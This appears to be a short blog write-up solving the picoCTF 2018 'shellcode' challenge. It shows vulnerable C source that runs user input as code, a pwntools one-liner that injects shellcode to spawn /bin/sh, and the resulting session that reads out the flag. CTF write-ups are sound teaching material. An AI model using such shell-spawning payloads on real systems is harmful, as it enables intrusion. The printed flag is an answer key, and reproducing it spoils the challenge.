Jerry's Blog
picoCTF 2018 shellcode Binary Exploitation
program
Source
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 148
#define FLAGSIZE 128

void vuln(char *buf){
    // gets() has no length limit, so input longer than BUFSIZE overflows buf
    gets(buf);
    puts(buf);
}

int main(int argc, char **argv){
    setvbuf(stdout, NULL, _IONBF, 0);

    // Set the gid to the effective gid
    // this prevents /bin/sh from dropping the privileges
    gid_t gid = getegid();
    setresgid(gid, gid, gid);

    char buf[BUFSIZE];

    puts("Enter a string!");
    vuln(buf);

    puts("Thanks! Executing now...");

    // Call buf as a function: the bytes just read run as machine code
    ((void (*)())buf)();

    return 0;
}

$ (python -c 'from pwn import *;print(asm(shellcraft.sh()))';cat) | ./vuln
Enter a string!
jhh///sh/binh4$ri1QjYQ1j
X̀
Thanks! Executing now...
ls
flag.txt vuln vuln.c
cat flag.txt
picoCTF{shellc0de_w00h00_26e91a77}
exit